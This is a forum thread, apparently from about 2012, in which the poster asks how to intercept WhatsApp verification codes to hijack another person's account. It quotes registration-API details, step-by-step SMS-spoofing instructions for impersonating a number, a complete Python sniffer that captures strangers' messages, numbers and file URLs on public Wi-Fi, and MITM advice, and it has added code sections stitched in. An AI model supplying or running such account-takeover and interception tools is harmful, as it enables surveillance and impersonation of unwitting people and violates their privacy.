
Help With Whatsapp Hack


lmfao


So I have heard that WhatsApp is not encrypted (it's an app like Viber) and that when you sign up for a number the code is generated within your phone, sent to WhatsApp's servers and then sent to you. Because it is not encrypted you can intercept it from your phone. I have been trying to figure it out for days and saw many links; does anyone have any advice? Here are two posts I found on the internet that might help. They used to have this thing where all you had to do was put your phone in airplane mode and the activation code would be in your outbox, not sent, but that won't work anymore.

A few weeks ago I also tried to look a little bit into WhatsApp but had to give up because of my final exams at school.

I used the Symbian S40 client and decompiled the .jar you can find via Google to look a little bit into it.

I'm not a programmer but had done some "Hello World" stuff in Java before, so I tried to understand a little bit of what is going on in the client. (In the following work I always pretended to be a Nokia C3-00, just so you know when it appears, e.g. in the User-Agent.)

I don't know if it's helpful for you, but I will try to share the things I found out by looking into the code, even though I can't guarantee they are right:

The first thing is the login name and the password needed to log in:

Matching reports from some other threads here and in other forums, the login name I found was something like:

Code:

international area code without the 0's or + at the beginning + phone number without the first 0 + @s.whatsapp.net

For example, if you live in Germany and have the phone number 017612345 it would be 4917612345@s.whatsapp.net -> 0049 for Germany without the 0's and the phone number without the 0.

The password is set during the registration process, but usually it is a transformation of the IMEI of your phone (in case you don't want to stand out you should also do it like this). I must admit I don't exactly know how this transformation works, but I have the code that does it.

I just wrapped it _very dirty_ in a standalone Java program to test it. Source: http://pastebin.com/npbwcj1s

I really don't know what exactly it does and didn't look deeper into it, but it isn't a "real" MD5 I think... (Maybe someone who knows how to create an MD5 in Java can look at it to see what is different, apart from the reversal of the IMEI?)

The second thing I searched for is the registration process.

With this I got so far that I got a registration code and I also get the response from the server that the account exists, but I can't log in because I hadn't enough time to look exactly at the login process. Just logging in via XMPP in Pidgin doesn't work as expected.

The registration process works this way: (no guarantee that it is right, and don't try it with your "real" number. I tried it with an old SIM I had lying around)

0) All these API requests are done with a User-Agent like:

Code:

WhatsApp/2.1.0 S40Version/04.60 Device/nokiac3-00

The code generating this is: http://pastebin.com/K79wrfnS

I used information I found on the web to fill in the details for the Nokia C3-00.

As said for the password: I don't think you really have to fake it to look like this, but it maybe makes it harder to find you.

1) The first step is requesting the registration code from the server (the code you get e.g. via SMS)

The API call looks like this:

Code:

https://r.whatsapp.net/v1/code.php?cc=49&in=17612345&to=4917612345&lc=DE&lg=de&mcc=000&mnc=000&imsi=00000000000000&method=sms

The arguments are as follows:

cc = area code without 0's

in = number without first 0

to = number where the SMS or call should go to (maybe a security weakness?)

lc/lg = language code(?) split up - e.g. DE_de goes to lc=DE&lg=de, US_en would be lc=US&lg=en

mcc/mnc/imsi = should be the "Mobile Country Code", "Mobile Network Code" and the "Mobile Subscriber Identification Number"

-> I don't know how to get them, and the app just has the 0's as a "fallback" when the system request for them fails, so it should work with the 0's (and it does)

The method is maybe the most interesting thing.

There are 3 methods: self, sms and voice

When choosing sms you get the code via SMS as you may know it; choosing voice you get a call at the to-number which reads out the code (I didn't test it, but it would match the information you find at some other places on the web). I don't know what self exactly does and I didn't really look for it because the SMS way seemed the best for me, especially because I just wanted to know my code :>

The answer after calling the API is an XML saying:

Code:

<code><response status="sucess-sent" result="30"></code>

What error messages look like I don't know because it worked for me (and I just looked into the code again and I didn't find any code that handles a specific error; it just closes the app when an error occurs, if I'm right) ^^

Also you should get an SMS (in case you used the method sms) at the "to" number containing the WhatsApp code, which looks like this:

Code:

WhatsApp code abc

abc is the necessary code

2) With the given code you can then register your WhatsApp account

API call:

Code:

https://r.whatsapp.net/v1/register.php?cc=49&in=17612345&udid=asdf&code=abc

cc/in = the same as in code.php

udid = the calculated password as explained in the login data

code = the just received WhatsApp code

The XML response looks like:

Code:

<register> <response status="ok" login="4917612345" result="new" /> </register>

The login value is your login name for the connection and is built as explained.

I think that there are error messages when the account already exists etc., but as said: I didn't have more time and it worked ^^

3) As third API call you can check if an account exists. This isn't necessary for registration, I think.

API call:

Code:

https://r.whatsapp.net/v1/exist.php?cc=49&in=17612345&udid=asdf

Parameters are the same as above.

Response when an account with this number and password exists:

Code:

<exist><response status="ok" result="4917612345" /></exist>

The result again gives the login name for this account.

I did some tests with this and even though I didn't save the exact answers I found out that it just checks if the account with the given number and the given password exists. You can't check if another number has a WhatsApp account with this API call. (or I was just too stupid to find out how to do this)

The last thing I searched for before studying for my exams was the server connection.

It basically is - as said everywhere - an XMPP connection. At least it looks like it.

I think there are some small differences between default XMPP and the way WhatsApp does it.

But nevertheless the URL I found that it tries to connect to is:

Code:

socket://bin-short.whatsapp.net:5222

When connecting to the URL with Pidgin and default XMPP it also gets a connection, but the connection gets closed by the server after sending the XML and XMPP information.

When I connected to a "default" XMPP server, after these two "sendings" the client gets a response from the server.

WhatsApp instead sends the auth directly after the features, so I think the server quits the connection because Pidgin is waiting for information and the server is also waiting for information.

The login process in the WhatsApp code looks like:

Code:

out.streamStart(connection.domain, connection.resource);

System.err.println("sent stream start");

sendFeatures();

System.err.println("sent features");

sendAuth();

System.err.println("sent auth");

in.streamStart();

System.err.println("read stream start");

String challengeData = readFeaturesAndChallenge();

System.err.println("read features and challenge");

sendResponse(challengeData);

System.err.println("sent response");

readSuccess();

Because WhatsApp uses a "default" XMPP library which is just modified and the default functions are still there, I think the default login process of XMPP looks like:

Code:

send1();

send2DigestMD5Mechanism();

read1();

String challenge = read2Challenge();

send2SASLResponse(challenge);

send2UselessResponse();

read2Challenge();

read2();

send3();

read3();

send4();

send5();

-> as said, after send1 and send2 (which do basically the same as the streamStart and sendFeatures in the WhatsApp version) it waits for information instead of sending the auth.

Here I stopped working on it because of the exams. I think it should not be too difficult to make a login work when completely rewriting the original functions.

Just for orientation, the whole (sub)class of the WhatsApp login: http://pastebin.com/X8gv2XRU

That's all I did up to now (or more exactly, before my exams).

I would really like to see somebody working on this and making it work on the N900. At first I wanted to look at it again after the exams, but even though I finished my exams two weeks ago I didn't find the time to work on this, and because I'm not a programmer it also would take at least a _very_ long time to work, if it would work at all.

If beta-testers are being sought for the program, I would really like to test it from a hobby-programmer or rather non-programmer point of view.

PS: Even though I personally don't like it when people ask for forgiveness for their bad English, I would like to do the same right now.

I'm from Germany and not really good at languages. I really hope my text is readable and you understand what I wanted to say with it ^^ (if you don't understand something, feel free to ask what it was meant to say)

and then I found this:

How to hack WhatsApp Messenger on Nokia, iPhone & Android


WhatsApp is a cross-platform messaging application used on smartphones. It allows users to exchange instant messages and share media via 3G or WiFi with other users on the platform. Back in May 2011 WhatsApp had a security breach when hackers realized that messages were being transmitted unencrypted as plain text, which left accounts open for hijacking. WhatsApp finally released a security update for this problem and the system became locked down.

In this article I will talk about alternative methods of hijacking WhatsApp messages and other protocols using a variety of methods.

The first hack I'm going to talk about will spoof WhatsApp and have it think you are somebody else, allowing you to communicate under an alternative name. This hack works by tricking the WhatsApp verification servers by sending a spoofed request for an authorisation code intended for an alternative phone. This method is also known to work on several other IM applications on iOS, Symbian & Android devices.

Hack 1

Install WhatsApp on your device

WhatsApp now starts a counter while it sends a verification message to its servers. If this verification fails after a specific time then WhatsApp offers alternative methods of verification. The message can be blocked by changing the message centre number or putting the phone into Airplane mode.

WhatsApp now offers an alternative method of verification.

Choose verify through SMS and fill in your email address. Once you click to send the SMS, click cancel to terminate the call for authorisation to the WhatsApp server.

Next we need to do some SMS spoofing.

There are numerous ways of doing this for free. A quick Google search will pull up a vast number of services which can spoof email addresses.

If you are using an iPhone, use the following details in the SMS spoofer application.

To: +447900347295

From: +(Country code)(mobile number)

Message: (your email address)

If you are using another device, then check your outbox, copy the message details into the spoofer application and send the spoofed verification.

You will now receive messages intended for the spoofed number on your mobile device and you can communicate with people under the spoofed number.

Hack 2

The second attack I'm going to talk about is a little bit more professional. For users who can pull off MITM (Man in the Middle) attacks this is a sure way to rake in data from a public network. I came across the script at the 0x80 blog, so I tried it on several public networks in Dublin (thanks to the karma code). The amount of data you can pull in from people sitting around you in a short amount of time is quite unreal. The code is written in Python so it's nice and simple to work with and edit to make it work for similar chat applications.

You will also need to parse the traffic, so check this link: http://www.secdev.org/projects/scapy/

Before you have a look at the code you may want to note that WhatsApp blurts out even more information for us to see. Doing a MITM attack and peeking at the packets, we can see that WhatsApp prints the mobile number and the name of the user your target is speaking with. This is important to note because this data can be used for some social engineering (calling the person to pull more information from them) or by checking web resources such as Facebook or LinkedIn to find their address, email accounts, websites and whatever else you're hunting for.

Example

DYN:~/whatsapp# python sniffer.py wlan0

#########################

## whatsapp sniff v0.1 ##

#########################

[+] Interface : wlan0

[+] filter : tcp port 5222

To : ***********

Msg : Hello, I will send you a file.

To : **********

Filename : .jpg

URL : https://mms*.whatsapp.net/a1/0/1/2/3/*md5hash*.jpg

From : ***********

Msg : Thanks file has been recieved, take this file too.

From : ***********

Filename : .jpg

URL : https://mms*.whatsapp.net/a2/0/2/3/1/*md5hash*.jpg

Code

You can grab the code on the downloads page http://insanitypop.com/downloads/ or view it below:

#!/usr/bin/env python3
# whatsapp sniff v0.1 -- qnix@0x80.org
# Ported to Python 3 and Scapy's current API. The original was Python 2 and
# set iface/verb/promisc on the "scapy" package instead of scapy.conf, and it
# had a syntax error (`len(fromNumber) = 1`) in the receive branch.
# The byte markers and slicing offsets below are the original author's
# heuristics for the plaintext 2011/2012 WhatsApp framing on TCP/5222; they
# are not a real protocol parser and will not match today's traffic.
import re
import sys

from scapy.all import IP, TCP, Raw, conf, sniff

Previous_Msg = ""
Previous_Filename = ""
Files = []
Messages = []
Urls = []


def banner():
    print("#########################")
    print("## whatsapp sniff v0.1 ##")
    print("##   qnix@0x80.org     ##")
    print("#########################\n")


def unescape(s):
    # Python 3 stand-in for Python 2's str.decode("string_escape"): turn the
    # \xNN text produced by repr() back into the original bytes (as latin-1).
    return s.encode("latin-1").decode("unicode_escape")


def extract(raw, msg_marker):
    """Pull (number, message, filename, url) out of one escaped payload.

    raw is the repr() form of the TCP payload ("'\\xf8\\x02...'"), so the
    markers are matched as literal backslash sequences, exactly as in the
    original script. The phone number is recovered by dropping every
    non-digit and slicing a fixed window; the hex digits of \\xNN escapes are
    counted too, which is why the window is fragile."""
    number = re.sub(r"\D", "", raw)
    if number[5:16].startswith("0"):
        number = number[6:17]
    else:
        number = number[5:16]
    filename = url = msg = ""
    try:
        after_file = raw.split("file\\xfc")[1]
        filename = after_file[1:37]
        url = after_file.split("\\xa5\\xfc")[1].split("\\xfd\\x00")[0][1:]
    except IndexError:
        pass
    try:
        msg = unescape(raw.split(msg_marker)[1][4:-1])
    except (IndexError, UnicodeDecodeError):
        pass
    return number, msg, filename, url


def report(label, number, msg, filename, url):
    """Print a message or an attachment once; consecutive repeats are skipped."""
    global Previous_Msg, Previous_Filename
    if len(number) < 10:
        return
    if msg and Previous_Msg != msg:
        Previous_Msg = msg
        print(label, ": ", number)
        print("Msg : ", msg)
        Messages.append(msg)
    elif filename and Previous_Filename != filename:
        Previous_Filename = filename
        print(label, ": ", number)
        print("Filename : ", filename)
        print("URL : ", url)
        Files.append(filename)
        Urls.append(url)


def whatsapp_parse(packet):
    # repr(bytes) gives "b'...'"; drop the leading b so the string has the
    # same shape as the Python 2 sprintf("%Raw.load%") output the offsets
    # were tuned for.
    raw = repr(bytes(packet[Raw].load))[1:]
    sport = packet[TCP].sport
    dport = packet[TCP].dport
    if dport == 5222:
        # Target sending stuff
        report("To", *extract(raw, "\\xf8\\x02\\x16\\xfc"))
    elif sport == 5222:
        # Received messages
        report("From", *extract(raw, "\\x02\\x16\\xfc"))


def callback(packet):
    # Only TCP segments with a payload are worth parsing.
    if packet.haslayer(IP) and packet.haslayer(TCP) and packet.haslayer(Raw):
        whatsapp_parse(packet)


def main():
    banner()
    if len(sys.argv) != 2:
        print("usage: %s <interface>" % sys.argv[0])
        sys.exit(1)
    conf.iface = sys.argv[1]
    conf.verb = 0
    conf.promisc = 0
    expr = "tcp port 5222"
    print("[+] Interface : ", conf.iface)
    print("[+] filter : ", expr)
    sniff(iface=conf.iface, filter=expr, prn=callback, store=0)
    print("[+] iface %s" % conf.iface)


if __name__ == "__main__":
    main()

Link to comment
Share on other sites
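The three registration calls the quoted maemo.org post walks through (code.php, register.php, exist.php), built and parsed offline, as an added example that is not code from the original posts or from WhatsApp. Taken from the post: the host r.whatsapp.net, the query parameters, the login-name format and the shape of the XML replies. Assumed here: the sample replies are constructed from the post's examples (the code.php reply is closed with "/>" so it parses as XML), the udid is treated as an opaque string because the post does not give the IMEI transformation, the "bad" target number is made up, and nothing below touches the network. The to_matches_number check is the server-side validation the post suspects is missing: the SMS/call target must be the number being registered.

```python
"""Added example, not from the original posts: WhatsApp registration calls
as the quoted post describes them, built and parsed offline."""
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs, urlencode, urlparse

BASE = "https://r.whatsapp.net/v1/"

# Constructed sample replies, following the examples in the post.
SAMPLE_CODE_RESPONSE = '<code><response status="sucess-sent" result="30"/></code>'
SAMPLE_REGISTER_RESPONSE = (
    '<register> <response status="ok" login="4917612345" result="new" /> </register>'
)
SAMPLE_EXIST_RESPONSE = '<exist><response status="ok" result="4917612345" /></exist>'


def normalize(cc, number):
    """Country code without '+' or leading zeros, national number without its leading 0."""
    cc = cc.lstrip("+0")
    number = number.lstrip("0")
    if not (cc.isdigit() and number.isdigit()):
        raise ValueError("country code and number must be digits")
    return cc, number


def login_name(cc, number):
    """XMPP login name as the post describes it: cc + number + @s.whatsapp.net."""
    cc, number = normalize(cc, number)
    return f"{cc}{number}@s.whatsapp.net"


def code_request_url(cc, number, lc, lg, method="sms", to=None,
                     mcc="000", mnc="000", imsi="0" * 14):
    """Step 1: ask for the verification code. 'to' defaults to cc+number,
    the only value a server should accept (see to_matches_number)."""
    if method not in ("self", "sms", "voice"):
        raise ValueError("method must be self, sms or voice")
    cc, number = normalize(cc, number)
    params = {"cc": cc, "in": number, "to": to or cc + number, "lc": lc, "lg": lg,
              "mcc": mcc, "mnc": mnc, "imsi": imsi, "method": method}
    return BASE + "code.php?" + urlencode(params)


def register_url(cc, number, udid, code):
    """Step 2: redeem the SMS/voice code. udid is the device password (opaque here)."""
    cc, number = normalize(cc, number)
    return BASE + "register.php?" + urlencode(
        {"cc": cc, "in": number, "udid": udid, "code": code})


def exist_url(cc, number, udid):
    """Step 3 (optional): check that number + udid is a known account."""
    cc, number = normalize(cc, number)
    return BASE + "exist.php?" + urlencode({"cc": cc, "in": number, "udid": udid})


def parse_response(xml_text):
    """Return the attributes of the <response .../> element of any of the replies."""
    root = ET.fromstring(xml_text)
    resp = root if root.tag == "response" else root.find("response")
    if resp is None:
        raise ValueError("no <response> element in reply")
    return dict(resp.attrib)


def to_matches_number(url):
    """The check the post hints is missing: the delivery target 'to' must equal
    the number being registered (cc + in). If a server accepts any 'to', the
    code for one number can be delivered to a phone the requester controls."""
    q = parse_qs(urlparse(url).query)
    return q["to"][0] == q["cc"][0] + q["in"][0]


def registration_ok(register_xml, cc, number):
    """The login returned by register.php must be the bare cc+number."""
    attrs = parse_response(register_xml)
    cc, number = normalize(cc, number)
    return attrs.get("status") == "ok" and attrs.get("login") == cc + number


if __name__ == "__main__":
    print(login_name("0049", "017612345"))
    url = code_request_url("49", "017612345", "DE", "de")
    print(url, "-> to ok:", to_matches_number(url))
    bad = code_request_url("49", "017612345", "DE", "de", to="4917699999")  # made-up target
    print(bad, "-> to ok:", to_matches_number(bad))
    print(parse_response(SAMPLE_CODE_RESPONSE))
    print(register_url("49", "017612345", "asdf", "abc"))
    print(registration_ok(SAMPLE_REGISTER_RESPONSE, "49", "017612345"))
```

The URLs come out exactly as the post lists them; the only logic beyond string building is the mismatch check, which is where a registration service has to refuse a request rather than deliver the code wherever the client asks.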

TLDR - But if the phone is WiFi capable, switch it to WiFi-only mode, MITM the phone and run Wireshark to see the packets.

Link to comment
Share on other sites

Sorry, thank you for replying. I didn't originally post links because I was not sure if I was allowed to, but the original link was: http://talk.maemo.org/showthread.php?t=81805&page=6

Morfir, in simple terms, I guess I am trying to intercept the code before it is sent out, make WhatsApp think it was sent and then enter the code myself, thus hacking into the account.

I have both an Android OS and a Nokia X2

and yes I have heard that WhatsApp is not encrypted; here are some links:

http://www.andreas-kurtz.de/2011/09/shooting-messenger.html

http://whatsappfail.com/hijack-someone-elses-whatsapp

http://insanitypop.com/2012/01/how-to-hack-whatsapp-on-nokia-iphone-android/

digip - I am not familiar with Wireshark, have not used it, but the thing is I want to intercept it on my own phone without it being sent out; Wireshark wouldn't do that, it would just show the packets

Link to comment
Share on other sites

Assuming that it's pushing packets in plain text; if not, then you have a whole different problem.

Going by what the OP said, that it was unencrypted, so yes, if sent in the clear, you would see it, but if SSL/TLS or encrypted in some other manner, then no, but at least you would be able to find out by MITMing the connection or intercepting it some other way.

Could also try a phone emulator, and see if you can drop the program on the emulator, and test from there, attach a debugger, pull memory for strings, etc.

Link to comment
Share on other sites
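Deciding whether the port-5222 traffic is actually readable before building anything on it, as suggested above, as an added example that is not from the thread. The checks are the standard TLS record header (content type 0x14-0x17 followed by version 0x03xx, RFC 5246 section 6.2.1) and the XMPP stream-open and STARTTLS elements (RFC 6120 sections 4 and 5); everything else is treated as opaque. All payloads below are constructed for the demo: the XMPP ones use the login-name format from the quoted post and one message text from the sniffer output above, and the binary sample is arbitrary bytes, not a claim about WhatsApp's framing. The session walk shows the caveat a capture-based check needs: a readable <stream:stream> header says nothing about the messages once <proceed/> has gone by.

```python
"""Added example, not from the thread: classify captured TCP/5222 payloads
as TLS records, XMPP elements or opaque bytes, and judge a whole session."""

TLS_TYPES = {0x14: "tls-ccs", 0x15: "tls-alert", 0x16: "tls-handshake", 0x17: "tls-appdata"}
XMPP_TLS_NS = b"urn:ietf:params:xml:ns:xmpp-tls"


def classify(payload: bytes) -> str:
    """Label one TCP payload by its leading bytes."""
    # TLS record header: type, major version 3, minor 0..4 (SSL3 .. TLS1.3), 2-byte length.
    if (len(payload) >= 5 and payload[0] in TLS_TYPES
            and payload[1] == 0x03 and payload[2] <= 0x04):
        return TLS_TYPES[payload[0]]
    head = payload.lstrip()[:64]
    if head.startswith(b"<?xml") or head.startswith(b"<stream:stream"):
        return "xmpp-stream-open"
    if head.startswith(b"<stream:features"):
        return "xmpp-features"
    if head.startswith(b"<starttls") and XMPP_TLS_NS in payload:
        return "xmpp-starttls"
    if head.startswith(b"<proceed") and XMPP_TLS_NS in payload:
        return "xmpp-proceed"
    if head.startswith(b"<"):
        return "xmpp-plaintext-stanza"
    return "binary-or-unknown"


def session_verdict(payloads):
    """Walk one session's payloads in order as (direction, bytes) and report
    whether any stanza was readable and whether the stream moved to TLS."""
    kinds = []
    upgraded = False
    readable = 0
    for direction, payload in payloads:
        kind = classify(payload)
        kinds.append((direction, kind))
        if kind == "xmpp-proceed":
            upgraded = True
        elif kind == "xmpp-plaintext-stanza":
            readable += 1
    if readable:
        verdict = "plaintext-messages-visible"
    elif upgraded or any(k.startswith("tls-") for _, k in kinds):
        verdict = "encrypted"
    else:
        verdict = "undetermined"
    return {"kinds": kinds, "upgraded_to_tls": upgraded,
            "plaintext_stanzas": readable, "verdict": verdict}


# Constructed sample payloads (not captured traffic).
XMPP_OPEN = (b"<?xml version='1.0'?><stream:stream to='s.whatsapp.net' "
             b"xmlns='jabber:client' xmlns:stream='http://etherx.jabber.org/streams' version='1.0'>")
FEATURES_TLS = b"<stream:features><starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/></stream:features>"
STARTTLS = b"<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>"
PROCEED = b"<proceed xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>"
PLAIN_MSG = (b"<message to='4917612345@s.whatsapp.net' type='chat'>"
             b"<body>Hello, I will send you a file.</body></message>")
# TLS ClientHello record header plus padding; only the 5-byte header matters here.
TLS_CLIENT_HELLO = b"\x16\x03\x01\x00\x2c\x01\x00\x00\x28\x03\x03" + b"\x00" * 32
TLS_APPDATA = b"\x17\x03\x03\x00\x10" + b"\xaa" * 16
BINARY = b"\x00\x01\x02\xf8\x05\x16\xfc\x03abc"  # arbitrary bytes

PLAINTEXT_SESSION = [("c>s", XMPP_OPEN), ("s>c", XMPP_OPEN),
                     ("c>s", PLAIN_MSG), ("s>c", PLAIN_MSG)]
STARTTLS_SESSION = [("c>s", XMPP_OPEN), ("s>c", XMPP_OPEN), ("s>c", FEATURES_TLS),
                    ("c>s", STARTTLS), ("s>c", PROCEED),
                    ("c>s", TLS_CLIENT_HELLO), ("s>c", TLS_APPDATA)]

if __name__ == "__main__":
    for name, session in (("plaintext", PLAINTEXT_SESSION), ("starttls", STARTTLS_SESSION)):
        v = session_verdict(session)
        print(name, v["verdict"], v["kinds"])
```

Run it against the payloads of a real capture (for example the Raw layer of each TCP segment, in order) instead of the samples; if the session lands on "encrypted", sniffing gives nothing and an active MITM with a certificate the client accepts is the only remaining path, which is a different problem from the one the thread started with.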

digip - I am not familiar with Wireshark, have not used it, but the thing is I want to intercept it on my own phone without it being sent out; Wireshark wouldn't do that, it would just show the packets

Well, if you MITM the attack and can see the packets, you could also change them on the fly. Not sure if something like Burp Suite or BeEF would work on a phone, but might be interesting to look into, even seeing if you can do the whole phone emulator thing and intercept the traffic, change what you want or drop what gets sent.

Link to comment
Share on other sites

Sorry, I know I already posted this and it's a long copy and paste, but is there a program within the phone itself, like a Nokia or an Android, where you could execute it?

or, as the guy showed, there was a URL he used to connect and spoof the UDID and number/connection: reference to post below:

API-Call:

Code:

https://r.whatsapp.n...d=asdf&code=abc

cc/in = the same as in code.php

udid = the calculated password as explained in the login data

code = the just received WhatsApp code

The XML response looks like:

Code:

<register> <response status="ok" login="4917612345" result="new" /> </register>

The login value is your login name for the connection and is built as explained.

I think that there are error messages when the account already exists etc., but as said: I didn't have more time and it worked ^^

3) As third API call you can check if an account exists. This isn't necessary for registration, I think.

API call:

Code:

https://r.whatsapp.n...12345&udid=asdf

Parameters are the same as above.

Response when an account with this number and password exists:

Code:

<exist><response status="ok" result="4917612345" /></exist>

The result again gives the login name for this account.

I did some tests with this and even though I didn't save the exact answers I found out that it just checks if the account with the given number and the given password exists. You can't check if another number has a WhatsApp account with this API call. (or I was just too stupid to find out how to do this)

The last thing I searched for before studying for my exams was the server connection.

It basically is - as said everywhere - an XMPP connection. At least it looks like it.

I think there are some small differences between default XMPP and the way WhatsApp does it.

But nevertheless the URL I found that it tries to connect to is:

Code:

socket://bin-short.whatsapp.net:5222

When connecting to the URL with Pidgin and default XMPP it also gets a connection, but the connection gets closed by the server after sending the XML and XMPP information.

When I connected to a "default" XMPP server, after these two "sendings" the client gets a response from the server.

WhatsApp instead sends the auth directly after the features, so I think the server quits the connection because Pidgin is waiting for information and the server is also waiting for information.

The login process in the WhatsApp code looks like:

Code:

out.streamStart(connection.domain, connection.resource);

System.err.println("sent stream start");

sendFeatures();

System.err.println("sent features");

sendAuth();

System.err.println("sent auth");

in.streamStart();

System.err.println("read stream start");

String challengeData = readFeaturesAndChallenge();

System.err.println("read features and challenge");

sendResponse(challengeData);

System.err.println("sent response");

readSuccess();

Because WhatsApp uses a "default" XMPP library which is just modified and the default functions are still there, I think the default login process of XMPP looks like:

Code:

send1();

send2DigestMD5Mechanism();

read1();

String challenge = read2Challenge();

send2SASLResponse(challenge);

send2UselessResponse();

read2Challenge();

read2();

send3();

read3();

send4();

send5();

-> as said, after send1 and send2 (which do basically the same as the streamStart and sendFeatures in the WhatsApp version) it waits for information instead of sending the auth.

Here I stopped working on it because of the exams. I think it should not be too difficult to make a login work when completely rewriting the original functions.

Just for orientation, the whole (sub)class of the WhatsApp login: http://pastebin.com/X8gv2XRU

Link to comment
Share on other sites
